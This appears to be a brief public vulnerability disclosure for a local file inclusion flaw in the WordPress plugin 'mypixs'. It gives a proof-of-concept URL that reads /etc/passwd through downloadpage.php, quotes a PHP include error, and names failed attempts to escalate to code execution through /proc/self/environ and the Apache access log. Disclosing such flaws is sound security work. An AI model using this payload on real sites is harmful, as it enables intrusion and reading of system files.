Plugin is still affected and has been closed. Typical local file inclusion vulnerability: from downloadpage.php: I’ve tried to get RCE but didn’t have success reading from /proc/self/environ or /var/log/apache2/access.log include(): Failed opening ‘/proc/self/environ’ for inclusion (include_path=‘.:/usr/share/php:/usr/share/pear’) in /usr/share/wordpress/wp-content/plugins/mypixs/mypixs/downloadpage.php on line 4
http://www.example.com/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd